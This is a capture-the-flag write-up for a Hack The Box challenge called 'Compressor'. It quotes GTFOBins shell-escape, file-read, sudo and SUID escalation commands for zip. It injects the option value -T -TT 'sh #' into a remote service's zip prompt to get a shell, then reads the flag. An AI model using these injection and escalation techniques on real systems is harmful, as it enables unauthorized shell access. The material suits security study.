<- MISC

Compressor

3 minutes to read

For this challenge we are only given a remote instance to connect to:

$ nc 157.245.33.77 31001

[*] Directory to work in: 9wIylX4fBakMNG8u6YfY37k3k1geVXHv  

Component List:

+===============+
|               |
|  1. Head  🤖  |
|  2. Torso 🦴   |
|  3. Hands 💪  |
|  4. Legs  🦵   |
|               |
+===============+

[*] Choose component:

We can choose the first one, for example:

[*] Choose component: 1

[*] Sub-directory to work in: 9wIylX4fBakMNG8u6YfY37k3k1geVXHv/Head  


Actions:

1. Create artifact
2. List directory    (pwd; ls -la)
3. Read artifact     (cat ./<name>)
4. Compress artifact (zip <name>.zip <name> <options>)
5. Change directory  (cd <dirname>)
6. Clean directory   (rm -rf ./*)
7. Exit

[*] Choose action:

Alright, we have some options to work with.

We see that we can use zip as a command and provide options. If we check GFTObins, we discover that we can actually get a shell with a specific parameter.

You can also check out my tool gtfobins-cli to view this information from the command line interface:

$ gtfobins-cli zip

zip ==> https://gtfobins.github.io/gtfobins/zip/


Shell

It can be used to break out from restricted environments by spawning an interactive system shell.

TF=$(mktemp -u)
zip $TF /etc/hosts -T -TT 'sh #'
rm $TF


File read

It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.

LFILE=file-to-read
TF=$(mktemp -u)
zip $TF $LFILE
unzip -p $TF


Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF


Limited SUID

If the binary has the SUID bit set, it may be abused to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run commands (e.g., via system()-like invocations) it only works on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.  

sudo install -m =xs $(which zip) .

TF=$(mktemp -u)
./zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF

Perfect, so we can use -T -TT 'sh #' as command options to get a shell. But first, we must create an artifact, because we do not have anything at the current working directory:

[*] Choose action: 2
/home/ctf/Rm4gXvPOefWkBXd3VYlOQyrGvLEnwNMm/Head
total 8
drwxr-sr-x    2 ctf      ctf           4096 May 19 00:45 .
drwxr-sr-x    6 ctf      ctf           4096 May 19 00:45 ..  



Actions:

1. Create artifact
2. List directory    (pwd; ls -la)
3. Read artifact     (cat ./<name>)
4. Compress artifact (zip <name>.zip <name> <options>)
5. Change directory  (cd <dirname>)
6. Clean directory   (rm -rf ./*)
7. Exit

[*] Choose action: 1


Insert name: asdf

Insert content: asdf


[+] Artifact [asdf] was created successfuly!

Actions:

1. Create artifact
2. List directory    (pwd; ls -la)
3. Read artifact     (cat ./<name>)
4. Compress artifact (zip <name>.zip <name> <options>)
5. Change directory  (cd <dirname>)
6. Clean directory   (rm -rf ./*)
7. Exit

[*] Choose action:

Now we can use the GTFOBin to get a shell and find the flag:

[*] Choose action: 4


Insert <name>.zip: asdf
Insert <name>: asdf
Insert <options>: -T -TT 'sh #'
  adding: asdf (stored 0%)
whoami
ctf
cd ..
ls
Hands
Head
Legs
Torso
cd ..
ls
Rm4gXvPOefWkBXd3VYlOQyrGvLEnwNMm
artifacts.py
clear.py
flag.txt
cat flag.txt
HTB{z1pp1ti_z0pp1t1_GTFO_0f_my_pr0p3rty}